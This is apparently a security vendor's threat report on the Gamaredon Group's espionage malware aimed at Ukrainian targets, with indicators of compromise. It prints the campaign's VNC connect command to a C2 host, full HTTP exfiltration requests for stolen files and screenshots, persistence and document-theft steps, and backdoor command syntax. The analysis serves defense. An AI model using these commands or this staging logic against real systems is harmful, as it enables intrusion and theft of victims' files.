download and install at hxxp://prestigeclub.frantov.com[.]ua/press-center/press/chrome-xvnc-v5517.exe.
The batch script would then attempt to have the VNC program connect to a command and control (C2) server to enable the server to control the compromised system. All VNC
installations on compromised systems that we observed have used the same configuration file, RC4 key file, and passwords.
One such sample, cfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31 first appeared around January of 2015. The batch script utilized in this sample
ensures a VNC connection is available:
start winlogons -autoreconnect -id:%sP% -connect grom56.ddns.net:5500
The path configured in the VNC configuration file across all implants employing VNC (UltraVNC.ini) is
RMS\vnc
. This isn
t the only
place hardcoded Cyrillic file paths are used by implants. Many of the batch scripts also use hardcoded paths such as
. Many payloads
also include a VBS script which raises a dialog box to the users asking them to run the malware again. It reads,
(0xc0000005).
(English Translation from Russian: Application failed to initialize (0xc0000005). Try to open the file again?).
Some of the SFX files also include another legitimate application called ChkFlsh.exe (8c9d690e765c7656152ad980edd2200b81d2afceef882ed81287fe212249f845). This
application was written by a Ukrainian programmer and is used to check performance of USB flash drives. Its value to the attackers to the attackers isn
t clear but one possibility is
that it is somehow used to steal or monitor files on USB devices. In our research, we found this application present in some SFX files along with VNC programs and in some SFX
files that didn
t have VNC programs included.
Custom Implants
While the most recent samples observed still use batch scripts and SFX files, the Gamaredon Group has moved away from applications like wget, Remote Manipulator Tool, VNC
and ChkFlsh.exe. Instead of using wget the attackers are distributing custom developed downloaders, and instead of Remote Manipulator or VNC the malware is using a custom
developed remote access implant.
In June of 2015 a custom downloader used by many newer samples was first seen in the wild and is often included in SFX implants with the name
LocalSMS.dll
. This
downloader makes requests to adobe.update-service[.]net (hardcoded in the sample) and is further discussed in Appendix A.
2/13
In February 2016, another custom tool now often included in SFX implants was seen in the wild. This SFX file
(3773ddd462b01f9272656f3150f2c3de19e77199cf5fac1f44287d11593614f9) contains a new Trojan
(598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824) we refer to as
Pteranodon.
Pteranodon is a custom backdoor which is capable of the following
tasks:
Capturing screenshots at a configurable interval and uploading them to the attacker
Downloading and executing additional files
Executing arbitrary commands on the system
The earliest version of Pteranodon uses a hardcoded URL for command and control. It sends POST requests to
msrestore[.]ru/post.php
using a static multipart boundary:
870978B0uNd4Ry_$
Newer versions of the tool also use hardcoded domains and multipart boundaries. They also share similar pdb strings. Other Pteranodon samples can be found in AutoFocus using
the Pteranodon tag. The most recent variant of Pteranodon is analyzed in Appendix A.
We have only identified one delivery vector for the new implants thus far. A Javascript file (f2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd) first seen in
December of 2016 downloads a resource from http://samotsvety.com[.]ua/files/index.pht (likely a compromised site used for staging payloads) which previously an SFX file
(b2fb7d2977f42698ea92d1576fdd4da7ad7bb34f52a63e4066f158a4b1ffb875) containing two of the Gamaredon custom tools.
A related sample (e24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4) used the same distinct Mutex and contains a larger set of tools for analysis. The
original name of the file is
AdapterTroubleshooter.exe
and the file uses icons which resemble those used by OpenVPN, as seen below.
Upon examining the sample
s file activity within AutoFocus it is clear the sample is a self-extracting executable.
Figure 3 Self Extracting executable behavior shown in AutoFocus
Opening the sample with 7zip inside of a virtual machine, all the files contents can be examined. Below is a table providing the SHA256 values, the filenames, the compile
timestamps and the pdb paths of the contents of the SFX file.
SHA256
Filename
Compile
Time
PDB Path
400f53a89d08d47f608e1288d9873bf8d421fc7cd642c5e821674f38e07a1501
LocalSMS.dll
Wed Apr
08:10:30
2015
c:\users\viber\documents\visual studio
2013\projects\contextmenu\release\contextmenu.pdb
d01df47b6187631c9a93bdad1298439ab1a1c5529b3319f3614b6ec2455e5726
MpClients.dll
Thu Sep
05:01:00
2016
c:\users\user\documents\visual studio
2015\projects\updaterv1\release\updaterv1.pdb
f2296bcb6be68dfb330baec2091fb11a42a51928ba057164213580e6ff0e1126
OfficeUpdate.dll
Dec 07
09:25:57
2016
2ded2f3b5b5b6155ce818893c67887cbfa8b539be6c983e314ccf2177552da20
SmartArtGraphicsLog.lnk
46a39da996b01e26ddd71d51c9704de2aa641cd3443f6fe0e5c485f1cd9fa65d
UsrClass.lnk
a972ad0ddc00d5c04d9fe26f1748e12008efdd6524c9d2ea4e6c2d3e42d82b7b
condirs.cmd
37c78ee7826d63bb9219de594ed6693f18da5db60e3cbc86795bd10b296f12ac
winrestore.dll
Mon Jan
03:12:39
2017
c:\develop\ready\winrestore
proxy\release\winrestore.pdb
90ba0f95896736b799f8651ef0600d4fa85c6c3e056e54eab5bb216327912edd
wmphost.exe
Thu Dec
08:23:32
2016
c:\develop\ready\mouse-move\mousemove\release\mouse-move.pdb
3/13
The bootstrapping logic for the sample relies on the contents of
condirs.cmd
. Briefly, the logic within
condirs.cmd
follows:
1. Ensure
%LOCALAPPDATA%\Microsoft\Windows\
exists
2. Kill and delete processes, files, and scheduled tasks which may interfere with the sample executing
3. Copy
winrestore.dll
to
%LOCALAPPDATA%\Microsoft\Windows\UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll
4. Copy
OfficeUpdate.dll
to
%LOCALAPPDATA%\Microsoft\Windows\UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll
5. Determine if the operating system is Windows XP or Windows 7
6. If the system is running Windows XP
a. Set the directory to copy files into as
%WINDIR%\Setup\State\Office
b. Copy
UsrClass.lnk
to
%USERPROFILE%\
c. Copy
SmartArtGraphicsLog.lnk
to
%USERPROFILE%\
7. If the system is running Windows 7
a. Set the directory to copy files into as
%APPDATA%\Microsoft\Office
b. Copy
UsrClass.lnk
to
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
c. Copy
SmartArtGraphicsLog.lnk
to
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
Figure 4 Windows XP and Windows 7 logic within
condirs.cmd
8. Copy
winrestore.dll
to the directory set in step 6 or 7a with the filename
MSO1234.win
9. copy
LocalSMS.dll
to the directory set in step 6 or 7a with the filename
MSO1567.dls
10. copy
OfficeUpdate.dll
to the directory set in step 6 or 7a with the filename
MSO5678.usb
11. copy
MpClients.dll
to the directory set in step 6 or 7a with the filename
MSO8734.obn
12. Execute the exported function
updater
within
MSO1234.win
using rundll32.exe
13. Execute the exported function
EntryPoint
within
MSO1567.dls
using rundll32.exe
It should be noted that
UsrClass.lnk
links to
%WINDIR%\system32\rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll,updater
and
SmartArtGraphicsLog.lnk
links to
C:\WINDOWS\system32\rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll,StartBackup
. These are the locations
winrestore.dll
and
OfficeUpdate.dll
were copied to in steps 3 and 4, respectively.
The
condirs.cmd
script then continues to:
1. Schedule the following tasks:
a. Task name
UpdatesWinRes
, invoke
MSO1234.win,updater
b. Task name
UpdatesWinDLL
, invoke
MSO1567.dls,EntryPoint
c. Task name
UpdatesWinUSBOOK
, invoke
MSO5678.usb,StartBackup
d. Task name
UpdatesWinOBN
, invoke
MSO8734.obn,bitDefender
2. Ensure the directory
%Temp%\reports\ProfileSkype\
exists
3. Kill processes named
skype.exe
4. Copy the contents of
%AppData%\Skype
to
%Temp%\reports\ProfileSkype\
5. Create subdirectories under
%Temp%\reports\%COMPUTERNAME\
with names: Z W P S V Q N M L K I J F H E G and D. These are drive letters.
6. Copy all files from all above drive letters with extensions
docx
xlsx
and
into
%TEMP%\reports\%COMPUTERNAME%\%%d\
where %%d is the
drive letter
7. Copy all files with the above extensions from all users
Desktop
Documents
, and
Downloads
folders to
%TEMP%\reports\%COMPUTERNAME%\Desktop\
4/13
%TEMP%\reports\%COMPUTERNAME%\Documents\
and
%TEMP%\reports\%COMPUTERNAME%\Downloads\
respectively
Figure 5 The document stealing logic inside
condirs.cmd
8. Execute the exported function
StartBackup
within
MSO5678.usb
using rundll32.exe
9. Execute the exported function
bitDefender
within
MSO8734.obn
using rundll32.exe
10. Clean up temporary files, sleep, and delete itself
When this script has completed, a series of implants giving the attacker the ability to steal files, capture screenshots and evade detection are deployed on the system. These
individual implants are analyzed in detail in Appendix A.
Trends Across Implants
While the payloads used to control compromised systems have evolved over time, many commonalities appear across the samples. While not every sample distributed by this
group is described in this blog, hashes of the known samples are included in the Indicators of Compromise section. Some interesting behaviors from a few of the related samples
include:
Many of the batch scripts include misspellings of common English words. One such example is the filename
. While another example,
domen
, is used as a variable
name in a batch script which is likely meant to be
domain
Almost all batch scripts in all samples ping localhost as a means of sleeping
Many of the batch scripts are named
and some include the string
Trons_ups
and
Treams
Many of the batch scripts use the same commands for determining operating system version.
Many of the early samples used applications such as wget, UltraVNC, and ChkFlash. These utilities have been replaced with custom tools in the latest sample
Samples employing VNC used the same configuration and passwords
Additionally, the infrastructure used by this group has not changed much in the past three years. Many of the samples reused the same domains for implant communication. Also,
many of the custom developed tools use hardcoded network locations.
Monikers used for filenames, exported DLL functions, domains, and variable names in scripts seem to be themed and consistent. By pivoting on indicators from one of the SFX
implants within AutoFocus additional samples are easily identified by overlaps in these consistencies. Most samples were delivered in a similar fashion: an SFX dropping
resources which are staged and loaded with a batch and/or VBS script. The reuse of SSL certificates between IPv4 addresses as well as the reuse of IPv4 addresses between
domains names is apparent when viewing a large collection of entities involved in this campaign, as shown below.
5/13
Focusing in on one of the newest samples (analyzed in Appendix A), the reuse of file names as well as SFX content files becomes apparent.
Figure 6 Overview of the relationships between Samples and Network Infrastructure used by the Gamaredon Group
Final Word
The implants identified have limited, generic, and often conflicting detections on VirusTotal. The threat group using these implants has been active since at least 2014 and has
been seen targeting individuals likely involved in the Ukrainian government. Some of the samples share delivery mechanisms and infrastructure with samples which are detected
by a few antivirus vendors as Gamaredon. However, newer variants deliver more advanced malware which goes unnamed.
Periodically, researchers at Palo Alto Networks hunt through WildFire execution reports, using AutoFocus, to identify untagged samples
artifacts in the hopes of identifying
previously undiscovered malware families, behaviors, and campaigns.
This blog presents a threat group identified by the above process using AutoFocus. By actively hunting for malicious activity and files instead of waiting for alerts to triage,
defenders can identify and building protections for new trends before they arrive on their corporate networks and endpoints. More details about this threat group can be found in
the AutoFocus tag GamaredonGroup.
Palo Alto Networks customers are protected from this threat in the following ways:
WildFire identifies the malware described in this report as malicious.
Traps prevents execution of the malware described in this report.
6/13
The C2 domains used by this group are blocked through Threat Prevention.
Special thanks go out to Tom Lancaster for both his assistance in this investigation and for his charming good looks.
Appendix A: Custom Implant Analyses
USBStealer: MSO5678.usb / OfficeUpdate.dll
This file is a USB file stealer which can be also guessed by its internal name
USBgrabber.dll
. However, the implementation is sloppy which makes it a file stealer for any newly
connected logical volume on a system. This is because the malware monitors the computer for messages WM_COMMAND and WM_DEVICECHANGE, but not verifying if a USB
drive was connected.
The malware creates two mutexes
__Wsnusb73__
and
__Wsnusbtt73__
. Then, it creates the following folder in the temp path of the local user:
C:\Users\\AppData\Local\Temp\reports
This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2
server
195.62.52.93
one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the
source drive:
POST /post.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----qwerty
Host: 195.62.52.93
Content-Length: ...
Cache-Control: no-cache
------qwerty
Content-Disposition: form-data; name="filename"
\\
------qwerty
Content-Disposition: form-data; name="filedate"
// :
------qwerty
Content-Disposition: form-data; name="compname"
||||||
------qwerty
Content-Disposition: form-data; name="serial"
------qwerty
Content-Disposition: form-data; name="w"
------qwerty
Content-Disposition: form-data; name="filesize"
------qwerty
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
...File data...
------qwerty--
The malware also creates a SQLite database named
asha.dat
in the local users temp folder. Therein, it keeps track of files which were stolen by calculating the MD5 hash of the
filename followed by the file length. Therefore, it creates a Unicode string of the original file path from the drive and concatenates the file size in bytes to it. Finally, it uses the API
functions MD5Init(), MD5Update() and MD5Final() to calculate the hash and store it in the database.
Figure 7 Structure of the database created by the malware
It should be noted, that only hashes of files are added to the database that don
t have the following extensions:
7/13
Downloader: MSO1567.dls / LocalSMS.dll
This file is essentially a simple downloader which contacts the C2 server to send some user data and get an executable as response which will be executed. The DLL is written in
C++ and contains all of the functionality is in an export function named
EntryPoint
. The file was compiled without any compiler or linker optimizations, thus the big file size and the
remaining PDB path string.
At first, the malware retrieves the temp path of the local user (
C:\Users\\AppData\Local\Temp\
), the computer name (e.g.
WIN-MLABCSUOVJB
), the hardware
profile GUID (e.g.
{826ee360-7139-11de-8d20-808e6f6e6263}
) and the volume serial number of C:\ drive (e.g.
1956047236
). Next, it takes the following hardcoded string:
http://adobe.update-service[.]net/index.php?comp=
To create a URL string with the victims information for contacting the C2 server:
http://adobe.update-service[.]net/index.php?comp=WIN-MLABCSUOVJB&id=WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236
To create the filename where the downloaded file will be saved, the malware tries to build a random string of 10 characters. However, due to an implementation error the string
always ends up being the same, namely
frAQBc8Wsa
. This string gets concatenated with the retrieved local users temp path to the following file path:
C:\Users\\AppData\Local\Temp\frAQBc8Wsa
Then, it uses the API function URLDownloadToFileA() to download a payload to disk and executes it via CreateProcess(). Finally, it sleeps for 60 seconds before terminating the
payload and the DLL exits.
Downloader: MSO8734.obn / MpClients.dll
This file is a slightly more advanced version of LocalSMS.dll downloader. Instead of downloading a payload directly to disk, this file requests a download command from the C2
server which contains the actual payload URL to be used. Therefore, it uses a basic network implementation based on the Winsock functions. All the functionality of this DLL is put
into an export function named
bitDefender
It creates a socket, requests the address of the hardcoded C2 server
win-restore.ru
via gethostbyname() and connects to it. Thereafter, it also collects the volume serial number
of C:\ drive, the computer name and the hardware profile GUID. With this information, it creates the following string used by a subsequent send() function call:
GET /css.php?id=WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236 HTTP/1.1
Host: win-restore.ru
Connection: close
The response will be stored into a memory buffer via recv() and scanned for the string
urltoload={
. As the name suggests, the received data contains the actual URL of the
payload inside curly brackets. The URL gets pulled out of the string and is used again as input for the API function URLDownloadToFile(). Again, the same file path will be used to
store the payload on disk and execute it:
C:\Users\\AppData\Local\Temp\frAQBc8Wsa
Pteranodon: MSO1234.win / winrestore.dll
Pteranodon is a backdoor which also can capture screenshots based on a configuration file created on the disk. Further, it uploads the screenshots to the C2 server unencrypted.
All the functionality of this DLL is put into an export function named
updater
At first, it retrieves the %APPDATA% folder of the local user to build the following file path:
C:\Users\\AppData\Roaming\Microsoft\desktop.ini
Then, it checks if the file already exists and continues execution if so. If not, it runs a routine which checks if there is mouse movement as an anti-sandbox technique. If no mouse
movement is detected the malware runs in an infinite loop checking for mouse movement.
If the file
desktop.ini
does not exist, the malware creates it and writes the following information into it:
interval={60} msfolder={10} status={0}
This information is used as configuration data to create the screenshots. There are also other commands possible which can be retrieved from the C2 server. The following
commands are available:
exec={
This command is used to download and execute a payload from a URL present in the curly brackets. It creates a random file path in temp folder, calls URLDownloadToFile() and
CreateProcess() to run the payload. Then, it waits 30s and terminates the payload.
interval={
This command is used to define the interval in seconds between the creation of two or more screenshots.
msfolder={
This command defines the number of screenshots to create.
command={ / command_c={
This command is used to execute a file present as a string between the curly brackets. The variant with the
uses the Windows tool cmd.exe with help of ShellExecute().
status={
This command contains the flag which defines if screenshots should be made (
) or not (
Next, it checks for a mutex named
asassin1dj
to verify if the system is already infected and creates it if this isn
t the case:
8/13
Figure 8 Mutex check and creation routine
Next, it creates the following folder, if not already present:
C:\Users\\AppData\Roaming\Microsoft\store
Next, according to the configuration data in
desktop.ini
it constantly creates 24-bit color depth JPEG screenshots without extension in the store folder with help of GDI32 and
gdiplus API functions. The following file naming scheme for the screenshots is used:
_
After the last screenshot was created, it uploads all files from the
store
folder to the C2 server
win-restore[.]ru
. Then, it deletes all the files present in the folder and starts a new
screenshot creation cycle. It should be noted that there is no check of what files are uploaded. The files are uploaded via POST HTTP method to the script
vvd.php
. For this, the
following HTTP request is used which contains also data from the victim as well the JPEG files:
POST /vvd.php HTTP/1.1
Accept: application/x-www-form-urlencoded
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=----------987978B0urd3Gf_$
Accept-Charset: utf-8
User-Agent: asasing
Host: win-restore.ru
Content-Length:
Cache-Control: no-cache
------------987978B0urd3Gf_$
Content-Type: text/html
Content-Disposition: form-data; name="uuid"
WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236
------------987978B0urd3Gf_$
Content-Type: application/octet-stream
Content-Disposition: form-data; name="file0"; filename="_"
Content-Transfer-Encoding: 8bit
...JPEG file...
------------987978B0urd3Gf_$
Content-Type: application/octet-stream
Content-Disposition: form-data; name="file1"; filename="_"
Content-Transfer-Encoding: 8bit
...JPEG file...
------------987978B0urd3Gf_$
Finally, it checks if any new command information is available from the C2 server and updates the
desktop.ini
file according to it. Based on functionality, compile timestamps, and
binary differencing this malware is likely an updated version of 598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824.
wmphost.exe
This file runs an infinite loop until mouse movement gets detected, then it exits. This file can be used to circumvent sandboxes that don
t simulate mouse movement. To detect if it
running inside a sandbox, another file can scan the list of running processes to see if
wmphost.exe
is present or not.
Appendix B: Indicators of Compromise
Domain Names
admin-ru[.]ru
adobe.update-service[.]net
apploadapp.webhop[.]me
brokbridge[.]com
cat.gotdns[.]ch
check-update[.]ru
childrights.in[.]ua
conhost.myftp[.]org
docdownload.ddns[.]net
downloads.email-attachments[.]ru
downloads.file-attachments[.]ru
dyndownload.serveirc[.]com
e.muravej[.]ua
9/13
email-attachments[.]ru
file-attachments[.]ru
freefiles.myftp[.]biz
getmyfile.webhop[.]me
googlefiles.serveftp[.]com
grom56.ddns[.]net
grom90.ddns[.]net
hrome-update[.]ru
hrome-updater[.]ru
loaderskypetm.webhop[.]me
loadsoulip.serveftp[.]com
mail.file-attachments[.]ru
mails.redirectme[.]net
mars-ru[.]ru
msrestore[.]ru
oficialsite.webhop[.]me
parkingdoma.webhop[.]me
poligjong.webhop[.]me
polistar.ddns[.]net
proxy-spread[.]ru
rms.admin-ru[.]ru
samotsvety.com[.]ua
skypeemocache[.]ru
skypeupdate[.]ru
spbpool.ddns[.]net
spread-service[.]ru
spread-ss[.]ru
spread-updates[.]ru
stor.tainfo.com[.]ua
tortilla.sytes[.]net
ukrnet.serveftp[.]com
ukrway.galaktion[.]ru
umachka[.]ua
update-service[.]net
updatesp.ddns[.]net
updateviber.sytes[.]net
webclidie.webhop[.]me
win-restore[.]ru
winloaded.sytes[.]net
winupdateloader[.]ru
www.file-attachments[.]ru
www.win-restore[.]ru
yfperoliz.webhop[.]me
URLs:
http://childrights.in[.]ua/public/manager/img/scrdll.ini
http://prestigeclub.frantov[.]com.ua/press-center/press/chrome-xvnc-v5517.exe
http://umachka[.]ua/screen/dk.tmp
http://umachka[.]ua/screen/screen.tmp
http://viberload.ddns[.]net/viber.nls
Hashes:
Samples using custom developed tools:
002aff376ec452ec35ae2930dfbb51bd40229c258611d19b86863c3b0d156705
08e69f21c3c60a4a9b78f580c3a55d4cfb74729705b5b7d01c1aecfd58fc49e6
0c47cf984afe87a14d0d4c94557864ed19b4cb52783e49ce96ebf9c2f8b52d27
0dc1010c3d3766158e2347d10fc78d9223c6e0e3a44aa8a76622aeff7d429ab9
0f745512940e0efd8f09c6d862571cba2b98fac9a9f7cf30dedcc08ace43a494
145dab86a43835bb37734c16756d6d64d8e5ac6b87c491c57385e27b564136b8
222e85e6d07bdc3a2141cdd582d3f2ed4b1ce5285731cc3f54e6202a13737f8d
2f2b26f2f7d164ea1f529edbc3cb8a1063b39121dad4dd19d8ee4bbbaf25ed37
3242183b1f0176a2e3cfb6bfef96b9d55c5a59ea9614dbde4ef89979336b5a5d
3773ddd462b01f9272656f3150f2c3de19e77199cf5fac1f44287d11593614f9
37c78ee7826d63bb9219de594ed6693f18da5db60e3cbc86795bd10b296f12ac
3e5b1116b2dfd99652a001968a05fc962974931a0596153ab0dea8e4a9982f89
400f53a89d08d47f608e1288d9873bf8d421fc7cd642c5e821674f38e07a1501
598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824
5b22ace98b57ed19d815c49983c96a3c6ff0b2701e8167d4422c6990982abcf9
5ec8b7ca4461720bd69fb49b3f6cae637d8ac3bbd675da938bc5a84e9b73b395
840b3d4cc95dbf311f792a9f50137056deb66bfdbb55eb9f54ff381a0df65656
90ba0f95896736b799f8651ef0600d4fa85c6c3e056e54eab5bb216327912edd
97ebd7bfad63b36b4572132f6ece359ff9991f269048c0b145411699bfe3dc34
9a1fd88970da3809f45cef00360d1e54ea11a70035c277c130404a67371e142d
9cb64d3242d2b591bd2ff13b1aadef2e6b4bf9147f4a0926613b7c9343feb312
a46508ec9e48c256261b2d1914532a36ac7da093253320135d77581051751b75
10/13
a7e27ff0695a4bdf58c584f48664acd3a385ccebf3a542fdd6d7383f414aa83a
a804beddd22bb76ea207a9607ed5c888f2f640cbd9ed9a32942fcd0b8a25c4d5
ae5ab2e887a9b46ea7819b7ebbb8163028e66882c97e75b0698dc3a69a69d7da
b2fb7d2977f42698ea92d1576fdd4da7ad7bb34f52a63e4066f158a4b1ffb875
b9434e5a14159c49af2d1a5a11d570f195797d6b17aa560c3dde4a5b3486bf2a
be2be662cc821a924d5641422dd1116e99188c6923da092ca3f0f8f862bd2d2d
d01df47b6187631c9a93bdad1298439ab1a1c5529b3319f3614b6ec2455e5726
d1ba365e93ff0a4f3a2cb1d657568e583e3fbd7dbb1c2c52e28f16480324e3bb
ddfc6bb4819527b2424d6e1a84f04b67adad79401e39efbffba5b7d727e732f0
df434f54802a6814628f30cae335c302bae7085c4e8314d71a41a47d9c410c39
e24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4
f2296bcb6be68dfb330baec2091fb11a42a51928ba057164213580e6ff0e1126
Samples using bundled commodity tools:
026be8a873560f1496c6961f6e36c312bdda01beacb17c4b744f35ee1923d061
03c943f5cba11b09b9c3afa0705d4a027e5a9d81b299711740cc5aedfe4b4aa1
03e5e99cc8280de4663c4b65bfd26782d4975258808a63a4b20bc068008df7f5
059e40ba91b2b2d827c200476fcbd0fad0d43ab198d0c206c996777d27e6de65
0669e61e51cf43daa431d52b5461c90bdce1b1bee03b087e4406c30264dcb9a4
068b9a9194efacc16cf142814e79b7041b6ab3d671a95bb508dbd30061c324aa
0b4a90b823a581311c4acb59f35e32f81f70ca16a2538f54f4dbe03db93350df
0b5316d723d1ebbec9aba0c9ff6761050305d644c3eeb5291b4e2c4de9e5fa15
0b8d59312699739b6e6cb7aeb0f22a2eaebbb0fd898a97ef9b83e8d8e9ce67a0
0dd13d2d0edbcf9d1825c2bfc165876ada2e4d04e2981a0003cb6503fad2287b
0ddb7867e31f3f30cd1cfe74393f8ac5bbdc61538278de9219a49345f0d3af7f
13fed3accac4f38f28e606b110a3b7924d9c7a1a911f8c0613d0bb791e715267
151cf4c83722ba171ae42640e5e13af67ca06ee0a06a74afa53931acf6ac1506
17006d77cc1459aa3d70e4e9377edb2547a7446647aa9872c9dd9ad860ed7e39
1ec7e595677038145991c6d84dc7808602142f258c1f90e9486cca0fe531d74f
208dc592111a8221a9c633efc120b890585f9a67ed340cbb5ec9db4cd5e164e4
2124adbee89f2c1cb65896bed26e7ffa8bf0fcbdfeb99a9e751fea9cca7a896b
22e97292671ada8deef4329eb115c52f6f1bc598bcf01a3961f1c35a2230a013
259a78122ef51ae503059143bf36941fc6090be83213d196ba3051ba36a0b2a1
26564c23530dd14e0042e074f4178a5b2ad6fc8f51f10138fc39941a6303bff9
29453fa1772b6d7d33842d6abbe0cb55c4a4b66a00f43284c8724d7c16749a7d
2a072d9ce63a94d2530cf9f18a232c6a09f6c7bdff9dbe27faceef53604145ea
2c02d3d3fadd76f9d21f5c093459ddc0045c94f17679269eb7a2990a1a88cb42
2d55000bb5cb9e3e1f137810c2e1eb899f68c40e4a6f6307f226c7b8af208abd
2ded2f3b5b5b6155ce818893c67887cbfa8b539be6c983e314ccf2177552da20
2e89436b355550ceb361fac1b03b78b71eda11d25f26223ac5c8c34ed8972a05
32b0e6394b110860371da5541946a6dcc85358a3951eddc86fdaf5794527c150
33934fcfae5760316b3f40e013cbb03d8086f8c30f9a4ba9bed3f9486a530796
34d86602882e86f8aaaeb7513126c8579a4489f2be31c279188e2f2ca8a0e141
390162dae62a0347e35cf5dad093cfc2f7d4ded62fba9d2df7af6133feb41ee0
3ef8602579c6b145fbaafc8970b4c9a6e7bebd11eb5e37eecaa67b4572c6038b
420acd7e8598fe994b59bf5d30f89e1c11b36cbef464a4786694cf9eada8dd4c
42b4c39179f76ea9eb5835b55a3cf4d8dbb29d42ee0622ad2e89ca48d01e8988
42eed03907c9dfa0e566fbe5968cdb5a1b7b5e18521f7327185ed2208c6c29b4
46a39da996b01e26ddd71d51c9704de2aa641cd3443f6fe0e5c485f1cd9fa65d
47d929c69bfd8d8efb9c280eabec2f73d4bddf1c3c30120c3fb6334623469888
505ef8cbc1271ce32f0c473468d75a1aba5073c37b2e6b49293ddc9efcb4ac96
5230453eeb98c5a183129ed8b918b429e96020887302ba30941c408108a1ab84
5363220b532d7da378b338e839a501ae5c006cc03c8b2d3627c480d64deb1221
558f33d478091993e5b5921604f8c3873efc87f551fddf61612b5c64d5b610f6
55c76f4f93f9e155fbb6a28447f97c1ccda0081061dc3cb9973d42c1686964b7
56c8246819f7de5cba91001793831441d4ce998ccb8237cb96c9f52e88ea384b
59bddb5ccdc1c37c838c8a3d96a865a28c75b5807415fd931eaff0af931d1820
5ac627f8964d3b9cad69f21e3b8f27305f1f68f49e4f4fae2c73949a04b32692
5ccc76ae1cdf668ba7f89c6cbd0bad44f148cbee736320ead237262ba170ffba
5cd4401c1dae9b9ecd75c96ab29dc64ce40bef3acc6faf7c001ff98ebd3b3413
5cd72eaf555813f1ee187def594584f5cfc6a5e83086f35e281327b5210adffb
5f8293eda9fb40684caddf576eba6c81f3a06911ca9e4ecf84ede3b2891cff5e
6c258151c593268c13c252d8f275192a6f7a74d5de5754f2cf20fb94be7ee6ea
0458e168baa4fa5942892065925ac82b12245551b539d54c2884b3a21c2699d8
877f1de209eb9d8b2a20a76f8773d12e5a1fcde4148868c7b73added392f62f6
29c728a169c5d18298e77db161dd5d2f6396ceca9ee7849b63ff8a8bc11f911e
98e092b7bfc3bbdaeb82e05de14ba5835c6ac626c17de9eef2049796a031dd10
27e08fb90ada2fd8ce6b6149786edd3b814dd0324257ebd919ed66ada0334b21
9f651ae6ea538238748614a7f86fe2b0f76e881d6c38da581f284e4b6f79b0ca
f47115ea58615781e56dcac673c19edf7ce00defd7ada709ae97b0708d3eac1e
b80719854f8744ba62e9f0e774c09e2e2ed79dd37f9f94ba3ed05ec8507d55e6
467f04914a1e6093bdaf5c28884bf95ec738234033b3292d289a0799de196d49
5c47d18b3f0e0274c6a66b2eab27d47c73a0105c263d41c6473aba9a28d0a4ba
01c5729ac1ae3928053c085fd616323a3715863ab3d7e9b8106c09e24df34183
5b6a691cf8faf238b27861941a1b667d889889cc9711a3e561403d6a6ed292c9
e2688f72cc7ae836be19e765e39318873554ee194a09945eb3f3805d04f256ca
11/13
9f0228e3d1577ffb2533584c2b1d87ebee0c0d490f981e61d18bb27ab02e52cb
2617f9301869304b88d8a3a4f7b2eab6b0edf264cc1a28b99f5685959242ec39
f3107a5a00f36e12be7cc2e37c35903ef855b8043492af374ea918385821443c
63fcfab8e9b97d9aec3d6f243003ea3e2bf955523f08e6f1c0d1e28c839ee3d5
05cbe01b1125897e0e982c587a10a72f4df795b844a4a2c4cec44aee7f30ce94
5a7da102c11960b9651650143a4a08ae4ce97d68dff999961f1ffc792531afeb
df6112e6bad4125b80b8829c13a2ca523bb82cf303cf531389d8795e7512c7e6
cfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31
e79dbcc8b60da280e53d9cf818eee1de34251e0551b9947bb2b79a31b131417e
a73eac15797130c381b5b4a65c3fb1cfc723b1586a1882c981211787bba285a6
3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b
f2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd
ca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc
550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6
f77d7940c51c2a1eab849dbd77e59c683ebf7820799ef349e7da2583e1aa11ae
2c5d55619d2f56dc5824a4845334e7804d6d306daac1c23bec6f078f30f1c825
7231177a115656041ba4e5b3cf0bf7a547b074f03592351484267e25cda7c899
d5405f99cec0166857274b6c02a7ef52b36274fedb805a17d2089fd24ed133cf
81921b6a7eba39a3f73895a57892ed3a46ab6365ac97d550ca3b9bff46c7a1c2
1eef9f8d7d3099b87be7ac25121f9d2ccacfb5ccf02b508fb2036b6e059c525f
5255061c3600df1a94b376fca40f3ccb69d1cb6dd42aa744b20a643c7292d20c
b5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13
5fb7f6f953be3b65d88bd86d1391ebc9f88fc10b0ef23541463ebf5b157f695c
6016cf9898d74e2e9030be7c987964d817ba28ad2253d1da54c81a1bf49db836
621e55421dffae981e3e933c65626314d5610c7c08f76f83a3d07f0ec6c36e2d
6ccc24971073d24d90c4cbaf83dfbae2969cbf527e319c7ee9a4babcbe88e456
6f8da9180eebe02ba35317cb8aee5c8df6ac29795af70eb9430c3588d457aad6
